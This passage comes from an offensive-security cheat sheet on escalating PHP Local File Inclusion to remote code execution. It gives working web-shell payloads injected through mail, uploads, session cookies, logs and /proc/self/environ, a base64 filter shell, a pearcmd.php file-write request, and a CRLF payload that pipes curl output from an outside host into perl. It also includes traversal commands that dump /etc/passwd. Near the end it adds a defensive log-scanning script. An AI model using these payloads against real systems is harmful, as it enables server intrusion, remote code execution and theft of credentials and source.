Send a mail to an internal account (user@localhost) containing your PHP payload like <?php echo system($_REQUEST["cmd"]); ?> and try to include the mail of the user with a path like /var/mail/<USERNAME> or /var/spool/mail/<USERNAME>
Via /proc/*/fd/
- Upload a lot of shells (for example: 100)
- Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)
Via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
Via upload
If you can upload a file, just inject the shell payload in it (e.g.: <?php system($_GET['c']); ?> ).
http://example.com/index.php?page=path/to/uploaded/file.png
In order to keep the file legible it is best to inject into the metadata of the pictures/doc/pdf
Via Zip file upload
Upload a ZIP file containing a compressed PHP shell and access:
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
Via PHP sessions
Check if the website uses PHP Session (PHPSESSID)
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
Set the cookie to <?php system('cat /etc/passwd');?>
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
Use the LFI to include the PHP session file
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm2
Via ssh
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
Via vsftpd logs
The logs for the FTP server vsftpd are located at /var/log/vsftpd.log. In the scenario where a Local File Inclusion (LFI) vulnerability exists, and access to an exposed vsftpd server is possible, the following steps can be considered:
- Inject a PHP payload into the username field during the login process.
- After the injection, use the LFI to retrieve the server logs from /var/log/vsftpd.log.
Via php base64 filter (using base64)
As shown in this article, the PHP base64 filter just ignores non-base64 characters. You can use that to bypass the file extension check: if you supply base64 that ends with ".php", it would just ignore the "." and append "php" to the base64. Here is an example payload:
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
Via php filters (no file needed)
This writeup explains that you can use php filters to generate arbitrary content as output. This basically means that you can generate arbitrary php code for the include without needing to write it into a file.
Via segmentation fault
Upload a file that will be stored as temporary in /tmp, then in the same request trigger a segmentation fault; the temporary file won't be deleted and you can search for it.
LFI2RCE via Segmentation Fault
Via Nginx temp file storage
If you found a Local File Inclusion and Nginx is running in front of PHP, you might be able to obtain RCE with the following technique:
Via PHP_SESSION_UPLOAD_PROGRESS
If you found a Local File Inclusion, even if you don't have a session and session.auto_start is Off: if you provide PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, PHP will enable the session for you. This can be abused to get RCE:
LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS
Via temp file uploads in Windows
If you found a Local File Inclusion and the server is running on Windows, you might get RCE:
Via pearcmd.php + URL args
As explained in this post, the script /usr/local/lib/php/pearcmd.php exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL, because it's documented that a URL param without an = should be used as an argument. See also watchTowr's write-up and Orange Tsai's "Confusion Attacks".
The following request creates a file in /tmp/hello.php with the content <?=phpinfo()?>:
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
The following abuses a CRLF vuln to get RCE (from here):
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
Via phpinfo() (file_uploads = on)
If you found a Local File Inclusion and a file exposing phpinfo() with file_uploads = on, you can get RCE:
Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
If you found a Local File Inclusion and you can exfiltrate the path of the temp file BUT the server is checking whether the file to be included has PHP marks, you can try to bypass that check with this Race Condition:
LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
Via eternal waiting + bruteforce
If you can abuse the LFI to upload temporary files and make the server hang the PHP execution, you could then brute force filenames for hours to find the temporary file:
To Fatal Error
If you include any of the files /usr/bin/phar, /usr/bin/phar7, /usr/bin/phar.phar7, /usr/bin/phar.phar. (You need to include the same one 2 times to throw that error).
I don't know how this could be useful, but it might be.
Even if you cause a PHP Fatal Error, the uploaded PHP temporary files are deleted.
Preserve traversal sequences from the client
Some HTTP clients normalize or collapse ../ before the request reaches the server, breaking directory traversal payloads. Use curl --path-as-is to keep the traversal untouched when hitting log/download endpoints that append a user-controlled filename, and add --ignore-content-length for pseudo-files such as /proc:
curl --path-as-is -b "session=$SESSION" \
"http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
--ignore-content-length -s | tr '\000' '\n'
Adjust the number of ../ segments until you escape the intended directory, then dump /etc/passwd, /proc/self/cwd/app.py, or other source/config files.
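For the defensive side, an added example (not from the original page) that scans request targets from constructed access-log lines for the indicators this page discusses: traversal sequences (including double-encoded ones), php:// and data:// wrappers, pearcmd.php arguments, session-file paths and /proc pseudo-files. The indicator names and sample lines are my own assumptions, modelled on the requests shown above.

```python
"""Added example: flag LFI / path-traversal indicators in request targets."""
import re
from urllib.parse import unquote

# Indicators drawn from the techniques described on this page (names assumed).
INDICATORS = {
    "traversal":    re.compile(r"(\.\./|\.\.\\)"),
    "php_wrapper":  re.compile(r"(?i)\b(php|data|expect|phar|compress\.zlib)://"),
    "pearcmd":      re.compile(r"(?i)pearcmd\.php|\+config-create\+"),
    "session_file": re.compile(r"(?i)/sess_[a-z0-9]+"),
    "proc_or_log":  re.compile(r"(?i)/proc/self/|/var/log/vsftpd\.log"),
    "php_tag":      re.compile(r"<\?(php|=)"),
}


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double-encoded ../ does not evade the
    patterns, then drop null bytes (%00) that truncate paths in old PHP."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "")


def classify(request_target: str) -> list:
    """Return the indicator names matched by one request target (empty = clean)."""
    text = normalize(request_target)
    return [name for name, pat in INDICATORS.items() if pat.search(text)]


# Constructed sample log lines, modelled on the requests shown on this page.
SAMPLE_LOG = [
    "GET /index.php?page=../../../../etc/passwd HTTP/1.1",
    "GET /index.php?page=%252e%252e/%252e%252e/proc/self/environ HTTP/1.1",
    "GET /index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHA.php HTTP/1.1",
    "GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php HTTP/1.1",
    "GET /index.php?lang=/../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 HTTP/1.1",
    "GET /index.php?page=about HTTP/1.1",
]


def scan(lines) -> dict:
    """Map each request target (second field of the request line) to its hits."""
    results = {}
    for line in lines:
        parts = line.split(" ")
        if len(parts) >= 2:
            results[parts[1]] = classify(parts[1])
    return results
```

Run `scan(SAMPLE_LOG)` to see which of the sample requests trip which indicator; the double-encoded line is only caught because of the repeated decoding in `normalize`.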
References
- PayloadsAllTheThings
- PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal/Intruders
- Horizon3.ai – From Support Ticket to Zero Day (FreeFlow Core path traversal → arbitrary write → webshell)
- Xerox Security Bulletin 025-013 – FreeFlow Core 8.0.5
- watchTowr – We need to talk about PHP (pearcmd.php gadget)
- Orange Tsai – Confusion Attacks on Apache
- VTENEXT 25.02 – a three-way path to RCE
- The Art of PHP: CTF‑born exploits and techniques
- When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise
- Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
- HTB: Imagery (admin log download traversal + /proc/self/environ read)